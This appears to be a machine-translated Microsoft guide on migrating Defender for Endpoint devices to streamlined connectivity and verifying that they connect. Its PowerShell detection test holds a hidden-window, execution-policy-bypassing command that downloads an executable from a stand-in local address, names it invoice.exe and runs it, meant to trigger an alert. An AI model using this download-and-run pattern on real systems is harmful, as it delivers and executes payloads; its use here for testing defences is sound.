移轉裝置以使用簡化的連線方法
適用於:
本文說明如何移轉 (重新上線) 先前已上線至適用於端點的 Defender 的裝置,以使用簡化的裝置連線方法。 如需簡化連線的詳細資訊,請 參閱使用簡化的連線將裝置上線。 裝置必須符合簡化連線中所列 的必要條件。
在大部分情況下,重新上線時不需要完整裝置脫機。 您可以執行更新的上線套件,然後重新啟動裝置以切換連線能力。 如需個別操作系統的詳細資訊,請參閱下列資訊。
重要事項
限制和已知問題:
- 我們發現在進階搜捕中
DeviceInfo table填ConnectivityType入 數據行的後端問題,讓您可以追蹤移轉進度。 我們的目標是儘快解決此問題。 - 針對裝置移轉, (重新上架) :切換至簡化的連線方法不需要脫機。 執行更新的上線套件之後,Windows 裝置需要完整裝置重新啟動,並重新啟動macOS和Linux的服務。 如需詳細資訊,請參閱本文中包含的詳細數據。
- Windows 10 版本 1607、1703、1709 和 1803 不支援重新上線。 先下線,然後再使用更新的套件上線。 這些版本也需要較長的 URL 清單。
- 不支援執行 MMA 代理程式的裝置,而且必須繼續使用 MMA 上線方法。
使用簡化的方法移轉裝置
移轉建議
從小型開始。 建議先從一小組裝置開始。 使用任何支援的部署工具套用上線 Blob,然後監視連線能力。 如果您使用新的上線原則,若要避免衝突,請務必將裝置從任何其他現有的上線原則中排除。
驗證和監視。 將小型裝置上線之後,請驗證裝置是否已成功上線,並且正在與服務通訊。
完成移轉。 在這個階段,您可以逐步推出移轉至一組較大的裝置。 若要完成移轉,您可以取代先前的上線原則,並從網路裝置移除舊的URL。
在繼續進行任何移轉之前,請先驗證 裝置必要 條件。 這項資訊是以上一篇文章為基礎,其重點在於移轉現有的裝置。
若要重新上線裝置,您必須使用簡化的上線套件。 如需如何存取套件的詳細資訊,請參閱簡化的連線。
根據操作系統,移轉可能需要在套用上架套件後重新啟動裝置或服務重新啟動:
Windows:重新啟動裝置
macOS:執行下列命令來重新啟動裝置或重新啟動適用於端點的 Defender 服務:
sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plistsudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist
Linux:執行下列命令來重新啟動適用於端點的 Defender 服務:
sudo systemctl restart mdatp
下表列出根據裝置作業系統之可用上線工具的移轉指示。
Windows 10和 11
重要事項
Windows 10 1607、1703、1709 和 1803 版不支援重新上線。 若要移轉現有的裝置,您必須使用簡化的上線套件完全離線並上線。
如需將 Windows 用戶端裝置上線的一般資訊,請 參閱將 Windows 用戶端上線。
確認符合必要條件: 使用簡化方法的必要條件。
本機指令碼
請遵循本機 腳本中的指引, (使用 簡化的上線套件) 最多 10 部裝置。 完成步驟之後,您必須重新啟動裝置,裝置連線才能切換。
群組原則
請遵循使用簡化的上線套件的 組 策略中的指引。 完成步驟之後,您必須重新啟動裝置,裝置連線才能切換。
Microsoft Intune
請遵循使用簡化的上線套件 Intune 中的指引。 您可以使用 [自動從連接器] 選項;不過,此選項不會自動重新套用上線套件。 Create 新的上線原則,並先以測試群組為目標。 完成步驟之後,您必須重新啟動裝置,裝置連線才能切換。
Microsoft Configuration Manager
請遵循 Configuration Manager 中的指引。
VDI
使用將 非持續性虛擬桌面基礎結構 (VDI) 裝置上線中的指引。 完成步驟之後,您必須重新啟動裝置,裝置連線才能切換。
使用已移轉裝置的簡化方法來驗證裝置連線能力
您可以使用下列方法來檢查是否已成功連線 Windows 裝置:
- 用戶端分析器
- 在 Microsoft Defender 全面偵測回應 中使用進階搜捕進行追蹤
- 使用適用於 Windows) 的 事件檢視器 (在本機追蹤
- 執行測試以確認與適用於端點的 Defender 服務的連線能力
- 檢查登錄編輯器
- PowerShell 偵測測試
針對 macOS 和 Linux,您可以使用下列方法:
- MDATP 連線能力測試
- 在 Microsoft Defender 全面偵測回應 中使用進階搜捕進行追蹤
- 執行測試以確認與適用於端點的 Defender 服務的連線能力
使用適用於端點的Defender用戶端分析器 (Windows) 在已移轉端點上線之後驗證連線能力
上線之後,執行 MDE Client Analyzer 以確認您的裝置正在連線到適當的更新 URL。
下載適用於端點的Defender感測器執行所在的 適用於端點的 Microsoft Defender Client Analyzer 工具。
您可以遵循驗證客戶端與 適用於端點的 Microsoft Defender 服務連線中的相同指示。 腳本會自動使用裝置上設定的上線套件, (應簡化版本) 以測試連線能力。
請確定已使用適當的 URL 建立連線能力。
在 Microsoft Defender 全面偵測回應 中使用進階搜捕進行追蹤
您可以在 Microsoft Defender 入口網站中使用進階搜捕來檢視連線類型狀態。
這項資訊可在 DeviceInfo 數據表的 “ConnectivityType” 數據行下找到:
- 數據行名稱:ConnectivityType
- 可能的值:
<blank>簡化、標準 - 數據類型:字串
- 描述:從裝置到雲端的連線類型
一旦裝置移轉為使用簡化的方法,且裝置與 EDR 命令 & 控制通道建立成功的通訊,該值就會表示為 “Streamlined”。
如果您將裝置移回一般方法,則值為「標準」。
對於尚未嘗試重新上線的裝置,此值會保持空白。
透過 Windows 事件檢視器 在本機裝置上追蹤
您可以使用 Windows 事件檢視器 的 SENSE 作業記錄,以新的簡化方法在本機驗證連線。 SENSE 事件標識碼 4 會追蹤成功的 EDR 連線。
使用下列步驟開啟適用於端點的Defender服務事件記錄檔:
在 Windows 選單上,選取 [開始],然後輸入 事件檢視器] 。 然後選取 [事件檢視器]。
在記錄清單的 [ 記錄摘要] 下,向下卷動直到您看到 Microsoft-Windows-SENSE/Operational 為止。 按兩下項目以開啟記錄。
您也可以展開[應用程式和服務記錄>] [Microsoft>Windows>SENSE ] 並選取 [ 操作],以存取記錄。
事件標識碼 4 會追蹤與適用於端點的 Defender 命令 & 控制通道的成功連線。 使用更新的 URL 確認連線成功。 例如:
Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com. <EventData> <Data Name="UInt1">6</Data> <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com> </EventData>訊息 1 包含連絡的 URL。 確認事件包含 endpoint.security.microsoft,com) (簡化的 URL。
如果適用,事件標識碼 5 會追蹤錯誤。
注意事項
SENSE 是內部名稱,用來參考支援 適用於端點的 Microsoft Defender 的行為感測器。
服務所記錄的事件會出現在記錄檔中。
如需詳細資訊,請參閱使用 事件檢視器 檢閱事件和錯誤。
執行測試以確認與適用於端點的 Defender 服務的連線能力
一旦裝置上線至適用於端點的Defender,請驗證它是否繼續出現在裝置清查中。 DeviceID 應該維持不變。
檢查 [裝置頁面時程表] 索引標籤,確認事件是否從裝置流出。
實時回應
確定 即時回應 可在您的測試裝置上運作。 請遵循 使用即時回應調查裝置上的實體中的指示。
請務必在連線後執行幾個基本命令,以確認連線 (,例如 cd、jobs、connect) 。
自動化調查及回應
確定自動化調查和回應可在您的測試裝置上運作: 設定自動化調查和回應功能。
針對 Auto-IR 測試實驗室,流覽至 Microsoft Defender 全面偵測回應>評估 & 教學>課程教學課程 & 模擬> **教學課程>自動化調查教學課程。
雲端提供的保護
以系統管理員身分開啟命令提示字元。
以滑鼠右鍵按兩下 [開始] 選單中的項目,選取 [ 以系統管理員身分 執行],然後在許可權提示字元中選取 [ 是 ]。
使用下列自變數搭配 Microsoft Defender 防病毒軟體命令行公用程式 (mpcmdrun.exe) ,以確認您的網路可以與 Microsoft Defender 防病毒軟體雲端服務通訊:
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection
注意事項
此命令僅適用於 Windows 10 版本 1703 或更新版本,或 Windows 11。 如需詳細資訊,請參閱使用 mpcmdrun.exe 命令行工具管理 Microsoft Defender 防病毒軟體。
第一次看見時測試區塊
遵循 適用於端點的 Microsoft Defender 第一次看見時封鎖 (BAFS) 示範中的指示。
測試 SmartScreen
遵循 Microsoft Defender SmartScreen 示範 (msft.net) 中的指示。
PowerShell 偵測測試
在 Windows 裝置上,建立資料夾:
C:\test-MDATP-test。以系統管理員身分開啟 [命令提示字元]。
在 [命令提示字元] 視窗中,執行下列 PowerShell 命令:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
命令執行之後,命令提示字元視窗會自動關閉。 如果成功,偵測測試會標示為已完成。
針對 macOS 和 Linux,您可以使用下列方法:
- MDATP 連線能力測試
- 在 Microsoft Defender 全面偵測回應 中使用進階搜捕進行追蹤
- 執行測試以確認與適用於端點的 Defender 服務的連線能力
macOS 和 Linux (MDATP 連線能力測試)
執行 mdatp health -details features 以確認simplified_connectivity:「已啟用」。
執行 mdatp health -details edr 以確認 edr_partner_geo_location 可用。 值應該是 GW_<geo> 『geo』 是租使用者地理位置的位置。
執行 mdatp 連線能力測試。 確定已簡化的 URL 模式存在。 您應該預期 '\storage' 會有兩個,一個用於 '\mdav',一個用於 '\xplat',另一個用於 '/packages'。
例如:https:mdav.us.endpoint.security.microsoft/com/storage
在 Microsoft Defender 全面偵測回應 中使用進階搜捕進行追蹤
請遵循與 Windows 相同的指示。
使用適用於端點的Defender用戶端分析器 (跨平臺) 來驗證新移轉端點的連線能力
下載並執行 macOS 或 Linux 的用戶端分析器。 如需詳細資訊,請 參閱下載並執行用戶端分析器。
mdeclientanalyzer.cmd -o <path to cmd file>從 MDEClientAnalyzer 資料夾內執行 。 命令會使用來自上線套件的參數來測試連線能力。執行
mdeclientanalyzer.cmd -g <GW_US, GW_UK, GW_EU>(,其中參數為 GW_US、GW_EU、GW_UK) 。 GW 指的是簡化的選項。 使用適用的租使用者地理位置執行。
意見反應
即將登場:在 2024 年,我們將逐步淘汰 GitHub 問題作為內容的意見反應機制,並將它取代為新的意見反應系統。 如需詳細資訊,請參閱:https://aka.ms/ContentUserFeedback。
提交並檢視相關的意見反應